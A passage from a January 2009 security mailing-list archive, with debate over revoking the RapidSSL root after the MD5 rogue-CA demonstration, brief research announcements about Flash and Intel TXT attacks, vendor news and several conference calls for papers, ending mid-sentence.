From alex at sotirov.net Thu Jan 1 14:17:50 2009 From: alex at sotirov.net (Alexander Sotirov) Date: Thu, 1 Jan 2009 14:17:50 -0500 Subject: [Dailydave] Questions about MD5+CA In-Reply-To: <495A5DC2.5020204@immunityinc.com> References: <495A5DC2.5020204@immunityinc.com> Message-ID: <20090101191750.GA9837@MacBook.local> On Tue, Dec 30, 2008 at 12:43:30PM -0500, Dave Aitel wrote: > So if someone was able to get a root CA for $20000 - shouldn't we > remove the RapidSSL root CA from our browsers with the next browser > update? I don't see why people think this would be hard to replicate > and hasn't been done previously to RapidSSL. Is it because no one > other than that one team can do math or buy PS3s? > > Microsoft's advisory on this is essentially defaulting to the "No one > else has ever done this" position. This is weird. Trusted Roots that > could have been used to sign these things need to get re-issued, > right? What am I missing here? I agree. If revoking a root CA cert is so inconvenient or Internet-breaking that it can't be done even after an attack on the root has been demonstrated in practice, then our trust in the PKI system is perhaps misplaced. If they don't revoke the root, the security of the PKI system from now until 2020 (when the RapidSSL cert expires) will rely on the assumption that our team did not make a second CA cert that nobody knows about and that nobody else did either. We didn't, but how can we possibly prove that? How can any CA that used MD5 prove beyond doubt that they have not signed a colliding key in the past? The lesson here is that if you have a mechanism like CA root revocation, you need to regularly exercise it, otherwise you won't be ready to use it when the real need arises. Perhaps we need to start revoking one randomly selected root each year to get everybody used to the idea and ready to do it for real when there is a real threat. We to drills and practice evacuating buildings for earthquakes and fires, so why not for online threats? Alex -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090101/0f58ad69/attachment.pgp From alex at sotirov.net Thu Jan 1 16:00:29 2009 From: alex at sotirov.net (Alexander Sotirov) Date: Thu, 1 Jan 2009 16:00:29 -0500 Subject: [Dailydave] MD5 Considered Harmful Today: Creating a rogue CA certificate In-Reply-To: <3BC59F96-DFAA-43F9-80F7-624E4ABA3E76@securityevaluators.com> References: <20081229150840.GA2808@MacBook.local> <20081230131618.GA11667@baltika> <20081230165235.GA7950@81-163-137-128.visitor.congress.ccc.de> <3BC59F96-DFAA-43F9-80F7-624E4ABA3E76@securityevaluators.com> Message-ID: <20090101210029.GA10450@MacBook.local> On Tue, Dec 30, 2008 at 12:51:01PM -0600, Charles Miller wrote: > That's great, but it doesn't answer the question we really care > about... who won the T-shirt? I need to go through all my emails and tweets to find out who came closest. Stay tuned. Alex -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090101/bf5f3686/attachment.pgp From dave at immunityinc.com Fri Jan 2 12:15:32 2009 From: dave at immunityinc.com (Dave Aitel) Date: Fri, 02 Jan 2009 12:15:32 -0500 Subject: [Dailydave] Questions about MD5+CA In-Reply-To: <20090101191750.GA9837@MacBook.local> References: <495A5DC2.5020204@immunityinc.com> <20090101191750.GA9837@MacBook.local> Message-ID: <495E4BB4.9080805@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Totally. This was a good opportunity for Mozilla or the IE team to be thought leaders in security, and neither stepped up. The right thing to do would have been to announce an update that disabled the root CA in 10 days. That gives everyone ten days to get a new certificate from somewhere else. Security is about hard choices. Currently, we're all about sticking our heads in the sand - which devalues SSL as a security protocol entirely. In my role as CTO at Immunity I try to do similar things: our newest researcher Skylar is learning about this the hard way when she calls up asking why her shiny new dell laptop does not yet support wireless. :> - -dave > > I agree. If revoking a root CA cert is so inconvenient or > Internet-breaking that it can't be done even after an attack on the > root has been demonstrated in practice, then our trust in the PKI > system is perhaps misplaced. > > If they don't revoke the root, the security of the PKI system from > now until 2020 (when the RapidSSL cert expires) will rely on the > assumption that our team did not make a second CA cert that nobody > knows about and that nobody else did either. We didn't, but how can > we possibly prove that? How can any CA that used MD5 prove beyond > doubt that they have not signed a colliding key in the past? -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJXkuztehAhL0gheoRAkzcAJ91MJXkxMORc3ft4Hl22XTvUavxRACaA10F b45C+Bh5he3BkQbwUANGgEM= =QsTJ -----END PGP SIGNATURE----- From bas.alberts at immunityinc.com Fri Jan 2 12:17:36 2009 From: bas.alberts at immunityinc.com (Bas Alberts) Date: Fri, 02 Jan 2009 12:17:36 -0500 Subject: [Dailydave] CVE-2008-5499, Linux Flash Player bug, unspecified no more Message-ID: <495E4C30.2090805@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi list, I recently did some work on the latest Linux Flash vulnerability, and found the results to be highly infotaining. Read all about it at: http://basonbugs.blogspot.com/2008/12/you-can-only-sit-down-if-you-are-human.html Love, Bas -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJXkwwLpdA2Ju9tfcRArqcAKCleHobU9qcEuLjwpPzzZUOUb0MxwCfYuQ0 I23bDOfx911O1d5jJ4iMEoQ= =nDie -----END PGP SIGNATURE----- From brouce at gmx.net Fri Jan 2 20:47:40 2009 From: brouce at gmx.net (wishi) Date: Sat, 03 Jan 2009 02:47:40 +0100 Subject: [Dailydave] Questions about MD5+CA In-Reply-To: <495E4BB4.9080805@immunityinc.com> References: <495A5DC2.5020204@immunityinc.com> <20090101191750.GA9837@MacBook.local> <495E4BB4.9080805@immunityinc.com> Message-ID: <495EC3BC.4060108@gmx.net> Dave Aitel schrieb: > Totally. This was a good opportunity for Mozilla or the IE team to be > thought leaders in security, and neither stepped up. The right thing > to do would have been to announce an update that disabled the root CA > in 10 days. That gives everyone ten days to get a new certificate from > somewhere else. Security is about hard choices. Currently, we're all > about sticking our heads in the sand - which devalues SSL as a > security protocol entirely. > > In my role as CTO at Immunity I try to do similar things: our newest > researcher Skylar is learning about this the hard way when she calls > up asking why her shiny new dell laptop does not yet support wireless. :> > > -dave > >> I agree. If revoking a root CA cert is so inconvenient or >> Internet-breaking that it can't be done even after an attack on the >> root has been demonstrated in practice, then our trust in the PKI >> system is perhaps misplaced. > >> If they don't revoke the root, the security of the PKI system from >> now until 2020 (when the RapidSSL cert expires) will rely on the >> assumption that our team did not make a second CA cert that nobody >> knows about and that nobody else did either. We didn't, but how can >> we possibly prove that? How can any CA that used MD5 prove beyond >> doubt that they have not signed a colliding key in the past? > http://www.cs.cmu.edu/~perspectives/index.html Just found that worth mentioning. Anyhow this neither solves the problem, nor affects it directly: Security is a business. It's _just_ about money; in the end. Management doesn't care about security, or an engineering perspective. Especially this case showed that an academic paper from 2007 has been ignored until someone bought 200 playstations and built a cluster, implemented the theory, and made it. RapidSSL had no Defense In Depth like "random" numbers, or credential checks. But I guess they effectively - because of this - made a lot of money. They kept the inventions very low. Obviously too low. The PKI CA chain of trust weakened for profit interests. Other CAs have better (more expensive) implementations - they invested in security. But the weakest chain - that what it is all about. Security is about choices. For sure. About the choice to maximize profit at all costs, or not. That brings me back to "Perspectives" - the firefox add on. I personally don't trust CAs, or huge PKIs. Latter always get weaker, the larger they grow. And CAs are an economy of strangely named companies that no one transparently monitors. It's interesting: in theory PKIs work very well, as long as there's no money. ;) wishi From jon at oberheide.org Sat Jan 3 04:44:15 2009 From: jon at oberheide.org (Jon Oberheide) Date: Sat, 03 Jan 2009 04:44:15 -0500 Subject: [Dailydave] Questions about MD5+CA In-Reply-To: <495EC3BC.4060108@gmx.net> References: <495A5DC2.5020204@immunityinc.com> <20090101191750.GA9837@MacBook.local> <495E4BB4.9080805@immunityinc.com> <495EC3BC.4060108@gmx.net> Message-ID: <1230975855.14889.26.camel@localhost> On Sat, 2009-01-03 at 02:47 +0100, wishi wrote: > Dave Aitel schrieb: > > Totally. This was a good opportunity for Mozilla or the IE team to be > > thought leaders in security, and neither stepped up. The right thing > > to do would have been to announce an update that disabled the root CA > > in 10 days. That gives everyone ten days to get a new certificate from > > somewhere else. Security is about hard choices. Currently, we're all > > about sticking our heads in the sand - which devalues SSL as a > > security protocol entirely. [snip] > >> If they don't revoke the root, the security of the PKI system from > >> now until 2020 (when the RapidSSL cert expires) will rely on the > >> assumption that our team did not make a second CA cert that nobody > >> knows about and that nobody else did either. We didn't, but how can > >> we possibly prove that? How can any CA that used MD5 prove beyond > >> doubt that they have not signed a colliding key in the past? > > [snip] > Security is about choices. For sure. About the choice to maximize profit > at all costs, or not. That brings me back to "Perspectives" - the > firefox add on. I personally don't trust CAs, or huge PKIs. Latter > always get weaker, the larger they grow. And CAs are an economy of > strangely named companies that no one transparently monitors. > > It's interesting: in theory PKIs work very well, as long as there's no > money. ;) On the other hand, I'd argue that PKIs are more effective when there _is_ money involved. While CAs will of course attempt to maximize profits, any commericial root CA included in popular browsers has a significant economic incentive to maintain its trust and reputation. Without revocation of the offending root CAs by browser vendors, it is sending a message that poor security practices will not be punished. Responsible (and justified, in this case) revocation is the only way to ensure that economic incentives continue to exist (eg. "Revocation costs us X dollars so we need to invest Y dollars to ensure our compliance") to improve the security practices of these CAs. Regards, Jon Oberheide -- Jon Oberheide GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090103/9bcd00e2/attachment.pgp From valsmith at attackresearch.com Sat Jan 3 22:42:11 2009 From: valsmith at attackresearch.com (val smith) Date: Sat, 3 Jan 2009 20:42:11 -0700 Subject: [Dailydave] Announcing Attack Research Message-ID: Hey all, About three years ago over the holidays I announced first on this list the creation of a malware research site. Now, three years later, again over the holidays, I've moved on, am no longer a part of that effort, and would like to announce the creation of a new project: http://www.attackresearch.com. The part you'll be most interested in probably is http://blog.attackresearch.com/. The basic idea is a community site where people can post technical details about different types of attacks. Think of it as a hacker how-to mixed with incident response case studies blog where anyone can post. I've kicked it off with a few posts that I hope you'll find interesting and that may give you some ideas of what I'm aiming for. Happy 07D9 and I hope to see some of you at one of the cons this year! V. From joanna at invisiblethingslab.com Mon Jan 5 11:33:49 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Mon, 05 Jan 2009 17:33:49 +0100 Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology Message-ID: <4962366D.6020102@invisiblethingslab.com> Hello DD, No longer then just a few weeks ago there was a discussion here at DD about Trusted Computing, TPM, TXT, etc [1], and even myself couldn't refrain from taking part in it. Back then I was not at liberty to disclose any details of the then-ongoing research on TXT security that Rafal and I was involved in. I'm happy now to add my 2 cents to the discussion with the following post: http://theinvisiblethings.blogspot.com/2009/01/attacking-intel-trusted-execution.html Happy New Year! joanna. -- Joanna Rutkowska Founder/CEO Invisible Things Lab http://invisiblethingslab.com/ [1] http://lists.immunitysec.com/pipermail/dailydave/2008-November/005427.html -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090105/db74668b/attachment.pgp From dave.aitel at gmail.com Mon Jan 5 22:10:00 2009 From: dave.aitel at gmail.com (Dave Aitel) Date: Mon, 5 Jan 2009 22:10:00 -0500 Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology In-Reply-To: <4962366D.6020102@invisiblethingslab.com> References: <4962366D.6020102@invisiblethingslab.com> Message-ID: So there's a way to bypass TXT and it involves an implementation error and a design error? This list is for lions - did I miss the meat? -dave On Mon, Jan 5, 2009 at 11:33 AM, Joanna Rutkowska wrote: > Hello DD, > > No longer then just a few weeks ago there was a discussion here at DD about > Trusted Computing, TPM, TXT, etc [1], and even myself couldn't refrain from > taking part in it. > > Back then I was not at liberty to disclose any details of the then-ongoing > research on TXT security that Rafal and I was involved in. I'm happy now to add > my 2 cents to the discussion with the following post: > > http://theinvisiblethings.blogspot.com/2009/01/attacking-intel-trusted-execution.html > > Happy New Year! > > joanna. > > -- > Joanna Rutkowska > Founder/CEO > Invisible Things Lab > http://invisiblethingslab.com/ > > > [1] http://lists.immunitysec.com/pipermail/dailydave/2008-November/005427.html > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From joanna at invisiblethingslab.com Tue Jan 6 04:34:48 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Tue, 06 Jan 2009 10:34:48 +0100 Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology In-Reply-To: References: <4962366D.6020102@invisiblethingslab.com> Message-ID: <496325B8.2050306@invisiblethingslab.com> Hi Lion, Dave Aitel wrote: > So there's a way to bypass TXT and it involves an implementation error > and a design error? This list is for lions Hoho ;) > - did I miss the meat? > The meat is in DC, the very next month. As it is customary these days, you're free to speculate on how each stage of the attacks might work, but, of course, we won't provide any comments on this until our BH presentation. Cheers, joanna. > -dave > > > On Mon, Jan 5, 2009 at 11:33 AM, Joanna Rutkowska > wrote: >> Hello DD, >> >> No longer then just a few weeks ago there was a discussion here at DD about >> Trusted Computing, TPM, TXT, etc [1], and even myself couldn't refrain from >> taking part in it. >> >> Back then I was not at liberty to disclose any details of the then-ongoing >> research on TXT security that Rafal and I was involved in. I'm happy now to add >> my 2 cents to the discussion with the following post: >> >> http://theinvisiblethings.blogspot.com/2009/01/attacking-intel-trusted-execution.html >> >> Happy New Year! >> >> joanna. >> >> -- >> Joanna Rutkowska >> Founder/CEO >> Invisible Things Lab >> http://invisiblethingslab.com/ >> >> >> [1] http://lists.immunitysec.com/pipermail/dailydave/2008-November/005427.html >> >> >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> >> -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090106/9b5c5ca3/attachment-0001.pgp From aoz.syn at gmail.com Tue Jan 6 11:00:03 2009 From: aoz.syn at gmail.com (RB) Date: Tue, 6 Jan 2009 09:00:03 -0700 Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology In-Reply-To: <496325B8.2050306@invisiblethingslab.com> References: <4962366D.6020102@invisiblethingslab.com> <496325B8.2050306@invisiblethingslab.com> Message-ID: <4255c2570901060800j32c5f541ifd1f121843dc7f92@mail.gmail.com> On Tue, Jan 6, 2009 at 02:34, Joanna Rutkowska wrote: > The meat is in DC, the very next month. As it is customary these days, you're > free to speculate on how each stage of the attacks might work, but, of course, > we won't provide any comments on this until our BH presentation. Thisjustin: Do current security theater^Wresearch practices involve nearly as much PR as actual work? Have previously meaningful discussion lists devolved to simple broadcast media for the profiteer? Find out at my next $1200/head media circus! From dave at immunityinc.com Thu Jan 8 11:48:35 2009 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 08 Jan 2009 11:48:35 -0500 Subject: [Dailydave] Hot and Cold. In and Out. And other Katy Perry Lyrics Message-ID: <49662E63.7080102@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 For those of you who are not aware, Immunity, DSquare, and Tenable have partnered up: http://finance.yahoo.com/news/Tenable-Announces-Partnership-bw-13990883.html Likewise, there's a new awesome VOIP Assessment tool pack that plugs into CANVAS: Video: http://www.vimeo.com/2465093 Link: http://www.immunityinc.com/products-enablesecurity.shtml and CANVAS Customers get free entry to uCon, in Recife Brazil! http://forum.immunityinc.com/index.php?topic=290.msg901#msg901 There's lots of good stuff on the Immunity forum lately. Even I posted on our new IP fingerprinting modules! http://forum.immunityinc.com/index.php?topic=282.0 One thing on my mind always is that everyone's software is different. There's no generalization in this business. If you're attacking lawyers, you're looking at the special software they use to do courtroom presentations. If you're attacking doctors, it's the TIFF parser that reads MRI results. If you're attacking hackers, it's cross site scripting in their SILICA devices. Likewise with vulnerability scanners. If you're scanning your internal enterprise with a web-enabled CANVAS (coming soon!) then it's important to have an exploit feed that takes the particulars of your business into account. It's important for it to be customized to YOU, and not the world at large. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJZi5itehAhL0gheoRAvsmAJ9qBubBQcC5/mJys3mQDC0qvqI3DQCghAbY G9ToeQw7LCaj2hEdlcyKa/4= =vFC/ -----END PGP SIGNATURE----- From snagg at sikurezza.org Wed Jan 7 06:58:54 2009 From: snagg at sikurezza.org (snagg) Date: Wed, 7 Jan 2009 12:58:54 +0100 Subject: [Dailydave] Call for papers and trainers - SeacureIT 2009 Message-ID: <9BF0F700-D1E5-451F-AA80-01ACACDEEBB6@sikurezza.org> Dear colleagues, it is my pleasure to officially announce the launch of SEaCURE.IT, the first international technical conference ever held in Italy on security releated topics. The 2009 edition will be held from May 19th to 22nd in the wonderful seaside resort Tanka Village, located in Villasimius, Sardinia, a large and beautiful island in the Mediterranean sea. Besides the main conference, featuring two tracks of top-notch presentations over two intense days, the programme will include two days of advanced trainings, and a set of unique social events (Italian style), in order to foster networking. A number of key speakers already confirmed their presence, and we warmly thank them for the trust placed in us. With this call for papers, we invite submission of papers from researchers worldwide for presentation at our conference. == About SEaCURE.it == SEaCURE.IT is the first international technical conference ever held in Italy on security releated topics, aimed at bringing together the leading experts from all over the world, to create a unique setting for networking and discussion among the speakers and the attendees. The 2009 edition will be held from May 19th to 22nd in the wonderful seaside resort Tanka Village, located in Villasimius. In a relaxed setting, our attendees and speakers will be able to meet and discuss in an informal, highly profitable way. Besides the main conference, featuring two tracks of top-notch presentations over two intense days, the programme includes two days of advanced trainings, and a set of unique social events (Italian style), in order to foster networking. SeacureIT is a non-vendor biased conference, strongly believing that it is possible to put together the brightest minds from the university, goverment, industry and hacking community to provide the audience with cutting-edge research in the field. Target Audience: Security Officers, Security Professionals and Product Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and Firewall-Admins, and Software Developers. == Speakers/Trainers == Until February 10th, 23:59 CET, we'll be accepting speech proposals. Please note we are a non-product, non-vendor biased security conference, and do not accept vendor pitches. Any talk evidently aimed at selling products or services will be rejected without consideration. We look for novel research and contributions in the fields of computer, network and information security. Please, submit your idea to us: we will carefully evaluate it. We will also evaluate proposals for 2-days technical trainings on the same topics. We offer the following speaker privileges: * * One economy class return-ticket to Cagliari for each accepted presentation. * * 3 nights of accomodation in the Conference Hotel. * * Meals for the speakers, and speaker activities during, before, and after the conference. * * A comprehensive program of activities for non-geek partners :) * * Speaker party We offer the following trainer privileges: * * 50% of the net profit of the class * * 3 nights of accomodation in the Conference Hotel * * Meals during the days of the training * * Free access to the Conference * * Participation to speaker activities == Topics == We are interested in bleeding edge security research, directly from leading researchers, professionals in academics, industry, and government, and the underground security community. Topics of special interest include, but are not limited to: * * Vista, Linux, OSX Security * * E/I-Voting Case-Studies, Attacks, Weaknesses * * Mobile Security * * Network Protocol Analysis * * AJAX/Web2.0/Javascript Security * * Secure Software Development * * VoIP * * Perimeter Defense / Firewall Technology * * Digital Forensics * * WLAN/WiFi, GPRS, IPv6 and 3G Security * * IPv6 * * Smart Card Security * * Cryptography * * Intrusion Detection * * Incident Response * * Rootkit Detection, Techniques, and Defense * * Security Properties of Web-Frameworks * * Malicious Code Analysis * * Secure Framework Design * * .Net and Java Security == Submissions == Please send your submission to cfp at seacure.it with the following information IN PLAIN TEXT in your email: 1. Presenter name and affiliation 2. Country and city of origin for your travel to the conference, as well as nationality/passport for visa requirements 4. contact information (e-mail address and a landline phone if possible) 5. SHORT biography, and a list of SELECTED publications and papers 6. Proposed paper title / proposed training title 7. Proposed paper abstract / proposed training outline 8. Three key reasons why you want to speak at SEaCURE.IT and why we would want you to speak :) 9. Optionally, any samples of prepared material or outlines (for this, a pdf attachment is acceptable) 10. Please list any other publications or conferences where this material has been or will be published/submitted. Concurrent submission is not a reason for rejection, while un-announced multiple submissions will make you look considerably bad ;-) This last point also applies for the trainings, please let us know how many times the training has been delivered and where. Regards, Vincenzo Iozzo From info at shakacon.org Fri Jan 9 03:34:49 2009 From: info at shakacon.org (Shakacon) Date: Thu, 8 Jan 2009 22:34:49 -1000 Subject: [Dailydave] ShakaCon 2009 Call for Papers and Trainers Message-ID: <0DAB602EAD833D44B10F51A28F258A11E74DAA@helix1.secure-dna.com> +===============================================================================================================================================+ ] ______ __ __ __ _______ ______ .______ .______ ___ .______ _______ .______ _______. [ ] / | / \ | | | | | ____| / __ \ | _ \ | _ \ / \ | _ \ | ____|| _ \ / | [ ] / ,----' / ^ \ | | | | ____| |_____/ |__| \_| |_) [ ___| |_) [___/ ^ \ | |_) [__| |__ | |_) [ ] ,----' [ ] ] | / /_\ \ | | | | / ___ _____ ____ _ / / __ ______ /_\ \ | ______ __| | / \ \ [ ] \ `-----' _____ \| `---' `----' / | | \ `--' / | |\ `---' / | | / _____ \__| | | |_____| |\ \---' [ [ ] \________/ \__________________/ |__| \______/ |__| \______/ |__| /__/ \_______| |___________| `._______/ [ ] [ +===============================================================================================================================================+ .oooooo..o ooooo ooooo .o. oooo oooo .o. .oooooo. .oooooo. ooooo oooo d8P' `Y8 `888' `888' .888. `888 .8P' .888. d8P' `Y8b d8P' `Y8b `888b. `88' Y88bo. 888 888 .8"888. 888 d8' .8"888. 888 888 888 88` ? 88 `"Y8888o. 888ooooo888 .8' `888. 88888[ .8' `888. 888 888 888 ???????? 88 `"Y88b 888 888 .88ooo8888. 888`88b. .88ooo8888. 888 888 888 ?????????????? ??? oo .d8P 888 888 .8' `888. 888 `88b. .8' `888. `88b ooo `88b ? ??? ?? ?????????? 8""88888P' o888o o888o o88o o8888o o888o o888o o88o o8888o `Y8bood8P' `Y8b ?????????? ???? ??????? ???? ??? ???? ? ?? ???? ???? ?????????? ?????? ??? ???? ?? ???? ???? ??? ??? ???? ? ???? ? ??????? ???? ??? ???? ???? ????????? ???? ??? ? ????? ??? v3.0 ????? ?? ?? ------------------------------------------ Shakacon III "Sun, Surf, and C Shells" CALL FOR PAPERS www.shakacon.org\2009CFP.html ------------------------------------------ Who: Shakacon Crew What: Shakacon III When: June 11 - 12 2009 Where: Paradise (Honolulu, HI - Hawaii Convention Center) Why: Why NOT? How: By plane, boat, canoe, yacht, hydrofoil, stand-up paddle board, jet ski, long board, dolphin, whale sled, nuclear submarine, etc. [Overview] Sitting around somewhere freezing your a$$ off? Dreaming about warm days, rainbows, decadent tropical drinks sipped out of coconuts? Sure you could drop your 0day in Vegas, bring down the Internet in Germany, or satisfy your dark desires in Asia but we think you should submit your research or topics to our CFP and maybe win yourself a paid trip to Hawaii. The Shakacon security conference is a laid back conference where industry, government, academia and independent experts will get together to share knowledge and experience in one of the most beautiful places on Earth. Shakacon will offer local, national, and international participants a casual, social, learning environment designed to present a "holistic" security view and the opportunity to network with peers and fellow enthusiasts in a relaxed setting. Leave your ego at the airport (or shoreline if you come in via another method)as we look forward to attendees varying in skill level from N00b to Ninja. During the day, sessions will include: best practices, case studies, research projects, etc. covering all different aspects of the information security landscape . There will be something for everyone and if sitting through talks isn't your cup of kava, there will be exciting events and contests for you to sharpen your skills and knowledge on. [Trainer Opportunities] Don't want to speak at the Con but have an uncanny ability to teach and a proven track record for delivering quality courseware and want to come to Hawaii? We're also interested in bringing in trainers to provide world class training leading up to ShakaCon (June 8, 9, 10). Submit a synopsis/class agenda, prior teaching experience, and maybe get selected to teach in Hawaii. [CFP Details] (1) Abstract for papers must be submitted to the review committee by _February 15th, 2009_. (2) Selection notification will occur by _February 27th, 2009_ and abstracts posted to the site on _March 1, 2009_. (3) Slides for your papers must be submitted by _April 15, 2009_. There are only a limited number of speaking sessions for which the conference organizers will provide travel and accommodations. Speaking slots should be generally limited to 1 hour; however we will accept "turbo" talk submissions and if we have enough we'll blend them into a block of the conference. The audience will be a broad mix of professional, academic, and enthusiast, so we welcome both technical and non-technical submissions on all aspects of security. The key criteria are practicality and timeliness. We want to provide our attendees with up to date materials they can take away and immediately gain benefit from as well as new research or tools. Absolutely NO SALES presentations will be accepted - our attendees don't show up to hear people talk about what you can sell them or why they need your services - or how your new anti0daySaaSuberfuzzymagadget will solve all their security woes. Proposals should include: "Shakacon CFP Submission: , " 1. Name, address, and contact info. 2. Employer and/or affiliations. 3. Brief biography. 4. Presentation experience. 5. Topic summary. 6. Reason this topic should be considered. 7. Other publications or conferences where this material has been or will be published/submitted. Please include plain text of all information provided in the body of your email as well as any file attachments. The plain text information will be reviewed first to find the most suitable candidates. Please forward the above information to info at shakacon.org in order to be considered. More conference information, registration details, and travel partner deals will be posted to: http://www.shakacon.org Follow Status on: www.twitter.com/shakacon ALOHA FROM THE SHAKACON CREW! This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090108/6c27b0e1/attachment-0001.htm From valsmith at attackresearch.com Mon Jan 12 16:13:27 2009 From: valsmith at attackresearch.com (val smith) Date: Mon, 12 Jan 2009 14:13:27 -0700 Subject: [Dailydave] Attacking Intel(R) Trusted Execution Technology In-Reply-To: <4255c2570901060800j32c5f541ifd1f121843dc7f92@mail.gmail.com> References: <4962366D.6020102@invisiblethingslab.com> <496325B8.2050306@invisiblethingslab.com> <4255c2570901060800j32c5f541ifd1f121843dc7f92@mail.gmail.com> Message-ID: Heh, thats a good point. I'll tell you what, (not that I ever speak about anything so interesting or controversial as most of you) but if there's no imminent lawsuit, I'll post all the details about whatever talk I'm going to give on my website before whatever conference. Then hopefully even though you'll know what I'm going to say, you'll still come see me for my good looks at least :) V. On Tue, Jan 6, 2009 at 9:00 AM, RB wrote: > On Tue, Jan 6, 2009 at 02:34, Joanna Rutkowska > wrote: >> The meat is in DC, the very next month. As it is customary these days, you're >> free to speculate on how each stage of the attacks might work, but, of course, >> we won't provide any comments on this until our BH presentation. > > Thisjustin: Do current security theater^Wresearch practices involve > nearly as much PR as actual work? Have previously meaningful > discussion lists devolved to simple broadcast media for the profiteer? > Find out at my next $1200/head media circus! > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From crioux at noctem.org Mon Jan 12 14:38:17 2009 From: crioux at noctem.org (Christien Rioux) Date: Mon, 12 Jan 2009 14:38:17 -0500 Subject: [Dailydave] SOURCE Boston Schedule Message-ID: <5680af290901121138k52b036b7g78f8157eb40f98a7@mail.gmail.com> SOURCE Conference is excited to announce the SOURCE Boston 2009 schedule and speaker line-up! SOURCE Boston March 9-10 (training) March 11-13 (conference) www.sourceconference.com Visit this URL to view the session schedule: http://www.sourceconference.com/index.php/source-boston-2009/boston-2009-sessions * Over 45 sessions and 50 speakers that have been hand selected by our board of expert advisors. * Learn how Microsoft Fixes Security Vulnerabilities. * Hear how Joe Grand, co-host of the hit show "Prototype This," explains complicated techniques and technologies in a way that millions of viewers could understand. * Introducing Heyoka: a new DNS Tunneling tool. * Learn and discuss the impact of Cloud Computing on the security industry. * Debate issues of disclosure with Dino Dai Zovi, Dan Kaminsky, Alex Sotirov, Katie Moussouris, and Ivan Arce, as Ryan Naraine moderates what is sure to be a controversial and riveting panel discussion. * Discuss the current economy and the effect it will have on the future of the security industry. * Participate in peer discussion groups and gain insight into the areas of security that are of interest to you. * Network with other security professionals and executives in an intimate and manageable environment. * Influence the evolution of the security industry. We hope you join us for what is sure to be THE EVENT of the year. Thanks, Stacy Thayer, Ph.D. Christien Rioux SOURCE Conference From dave at immunityinc.com Tue Jan 13 12:24:38 2009 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 13 Jan 2009 12:24:38 -0500 Subject: [Dailydave] It's Microsoft Tuesday! Message-ID: <496CCE56.8030106@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Are you excited? I know we are! :> Downstairs an Unethical Hacking Class is going on and they're just about ready to take on a nice stack overflow, which is what I assume it is! It's CRITICAL! ALERT ALERT! :> http://forum.immunityinc.com/index.php?topic=301.0 - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJbM5VtehAhL0gheoRAqDiAKCAMP2eAziCgA3bkAbDdgJhknU4vQCdGxCy TOoEWw3mvEFDeY38+SqATUs= =m2xP -----END PGP SIGNATURE----- From kgconference at gmail.com Wed Jan 14 04:00:34 2009 From: kgconference at gmail.com (k g) Date: Wed, 14 Jan 2009 11:00:34 +0200 Subject: [Dailydave] Call for Papers: Cyber Warfare Message-ID: ----- Call for Papers! Conference on Cyber Warfare June 17-19, 2009 Tallinn, Estonia The Cooperative Cyber Defence Centre of Excellence is hosting a Conference on Cyber Warfare in 2009. CCD CoE is soliciting research papers within the emerging field of cyber warfare, including but not limited to the following topics: # Concepts and Doctrine # Technical Challenges and Solutions # Strategic Analysis # Cooperative Cyber Defence # Lessons Learned # Proofs of Concept # The Future The Selection Committee seeks submissions from academia and the professional world that offer an original and substantial contribution toward understanding conflict in cyberspace. Authors should send a one-page abstract to cfp at ccdcoe.org between January 1 and March 15, 2009. The Selection Committee will notify all authors of its decisions ASAP following submission but NLT April 1. Final papers are due May 15, 2009. They will be presented at the conference by the 